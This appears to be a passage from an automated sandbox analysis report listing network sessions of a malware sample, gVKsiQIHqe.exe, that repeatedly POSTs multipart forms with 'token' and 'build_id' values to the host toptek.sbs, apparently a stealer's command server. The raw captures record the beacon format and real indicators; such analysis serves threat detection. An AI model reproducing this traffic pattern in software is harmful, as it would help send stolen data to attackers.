                                                                                                                                                                                                                                                                                    2024-12-23 05:58:53 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 52 51 51 39 52 51 49 45 55 33 37 51 51 51 49 57 54 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 52 51 51 39 52 51 49 45 55 33 37 51 51 51 49 57 54 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 52 51 51 39 52 51 49 45 55 33 37 51 51 51 49 57 54 32 4e 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------RQQ9RQIEU37QQQIWT2NGContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------RQQ9RQIEU37QQQIWT2NGContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------RQQ9RQIEU37QQQIWT2NGCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    72192.168.2.55008194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:54 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----VAS26F37QIEUAAI5FUAS
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:54 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------VAS26F37QIEUAAI5FUASContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------VAS26F37QIEUAAI5FUASCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    73192.168.2.55008894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:56 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6XLX4OZU37QQQQ1DJM7Q
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:56 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 4c 58 34 4f 5a 55 33 37 51 51 51 51 31 44 4a 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 58 34 4f 5a 55 33 37 51 51 51 51 31 44 4a 4d 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 58 34 4f 5a 55 33 37 51 51 51 51 31 44 4a 4d 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6XLX4OZU37QQQQ1DJM7QContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6XLX4OZU37QQQQ1DJM7QCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    74192.168.2.55008994.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:57 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----8Y5FK6F37QIE37Q1NGL6
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:57 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------8Y5FK6F37QIE37Q1NGL6Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------8Y5FK6F37QIE37Q1NGL6Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------8Y5FK6F37QIE37Q1NGL6Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:58 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    75192.168.2.55009594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:59 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6PH4O89RQIEU37YMYCJ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:59 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PH4O89RQIEU37YMYCJ5Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:00 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    76192.168.2.55009894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:00 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6PH4O89RQIEU37YMYCJ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:00 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 50 48 34 4f 38 39 52 51 49 45 55 33 37 59 4d 59 43 4a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6PH4O89RQIEU37YMYCJ5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6PH4O89RQIEU37YMYCJ5Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:01 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    77192.168.2.55010594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:02 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----I5XL6XLN7QIM7Q1D2NGD
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:02 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 49 35 58 4c 36 58 4c 4e 37 51 49 4d 37 51 31 44 32 4e 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 49 35 58 4c 36 58 4c 4e 37 51 49 4d 37 51 31 44 32 4e 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 35 58 4c 36 58 4c 4e 37 51 49 4d 37 51 31 44 32 4e 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------I5XL6XLN7QIM7Q1D2NGDContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------I5XL6XLN7QIM7Q1D2NGDContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------I5XL6XLN7QIM7Q1D2NGDCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:03 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    78192.168.2.55011094.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:03 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DBAI5X4OZU3EUASRQ16P
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:03 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------DBAI5X4OZU3EUASRQ16PContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------DBAI5X4OZU3EUASRQ16PContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------DBAI5X4OZU3EUASRQ16PCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:04 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    79192.168.2.55011694.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:06 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----PHLXTJ5XBIEU3EU3W4W4
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:06 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 4c 58 54 4a 35 58 42 49 45 55 33 45 55 33 57 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 58 54 4a 35 58 42 49 45 55 33 45 55 33 57 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 58 54 4a 35 58 42 49 45 55 33 45 55 33 57 34 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------PHLXTJ5XBIEU3EU3W4W4Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    80192.168.2.55011894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:07 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----PHLXTJ5XBIEU3EU3W4W4
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
